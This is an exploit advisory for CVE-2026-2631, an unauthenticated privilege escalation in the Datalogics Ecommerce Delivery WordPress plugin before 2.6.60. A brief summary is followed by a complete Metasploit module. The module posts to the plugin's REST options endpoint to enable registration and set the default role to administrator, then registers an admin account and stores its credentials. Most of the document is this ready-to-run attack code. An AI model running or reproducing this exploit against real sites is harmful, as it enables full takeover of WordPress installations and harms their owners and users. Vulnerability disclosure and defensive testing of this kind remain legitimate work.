===============================================================================================================================================================================
| # Title     : WordPress Datalogics Ecommerce Delivery Plugin < 2.6.60 Privilege Escalation via Insecure Configuration Manipulation Leading to Admin Account Creation        |
| # Author    : indoushka                                                                                                                                                     |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                                                              |
| # Vendor    : https://fr.wordpress.org/plugins/datalogics/                                                                                                                  |
================================================================================================================================================================================

[+] Summary    : A critical vulnerability exists in the Datalogics Ecommerce Delivery WordPress plugin versions prior to 2.6.60, allowing unauthenticated attackers to modify 
                 sensitive plugin and WordPress configuration options due to insufficient access control in the exposed REST API.
                 The flaw enables attackers to enable user registration, change the default user role to administrator, and leverage the public registration mechanism to create an administrative account. 
				 This results in a full privilege escalation chain, ultimately leading to complete takeover of affected WordPress installations.
                 The issue is caused by improper authentication and authorization checks on configuration update endpoints, exposing critical administrative functionality to unauthenticated users.
				 
[+] POC   :  

##
# CVE-2026-2631
# Datalogics Ecommerce Delivery < 2.6.60 Privilege Escalation
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WordPress Datalogics Ecommerce Delivery Privilege Escalation',
        'Description' => %q{
          This module exploits an unauthenticated privilege escalation vulnerability
          in the Datalogics Ecommerce Delivery plugin (< 2.6.60).

          The API allows insecure modification of WordPress options without authentication,
          enabling attackers to:

          1. Enable user registration
          2. Set default role to administrator
          3. Create a new admin account via public registration flow
        },
        'Author' => [
          'indoushka'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', 'CVE-2026-2631' ]
        ],
        'DisclosureDate' => '2026-01-01',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [CONFIG_CHANGES]
        }
      )
    )

    register_options([
      OptString.new('USERNAME', [true, 'Admin username', 'admin_poc']),
      OptString.new('EMAIL', [true, 'Admin email', 'admin@poc.local']),
      OptString.new('PASSWORD', [true, 'Admin password', 'P@ssw0rd123']),
      OptString.new('TARGETURI', [true, 'WordPress base path', '/'])
    ])
  end

  def run_host(ip)
    @uri = normalize_uri(target_uri.path)

    print_status("Target: #{rhost}:#{rport}#{@uri}")

    unless enable_registration
      print_error("Failed to enable registration")
      return
    end

    unless set_default_role
      print_error("Failed to set default role")
      return
    end

    if register_admin
      print_good("Admin account created successfully!")

      report_cred(
        ip: rhost,
        port: rport,
        service_name: 'wordpress',
        user: datastore['USERNAME'],
        password: datastore['PASSWORD'],
        proof: "Admin created via Datalogics exploit"
      )
    else
      print_error("Exploitation failed")
    end
  end

  def enable_registration
    uri = normalize_uri(@uri, 'wp-json', 'datalogics', 'v1', 'options')

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => uri,
      'ctype' => 'application/json',
      'data' => {
        'users_can_register' => 1
      }.to_json
    })

    res && res.code == 200
  end

  def set_default_role
    uri = normalize_uri(@uri, 'wp-json', 'datalogics', 'v1', 'options')

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => uri,
      'ctype' => 'application/json',
      'data' => {
        'default_role' => 'administrator'
      }.to_json
    })

    res && res.code == 200
  end

  def register_admin
    uri = normalize_uri(@uri, 'wp-login.php?action=register')

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => uri,
      'ctype' => 'application/x-www-form-urlencoded',
      'vars_post' => {
        'user_login' => datastore['USERNAME'],
        'user_email' => datastore['EMAIL'],
        'user_pass' => datastore['PASSWORD']
      }
    })

    res && res.code == 200
  end

  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp'
    }

    credential_data = {
      origin_type: :service,
      module_fullname: self.fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login({
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL
    })
  end
end

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================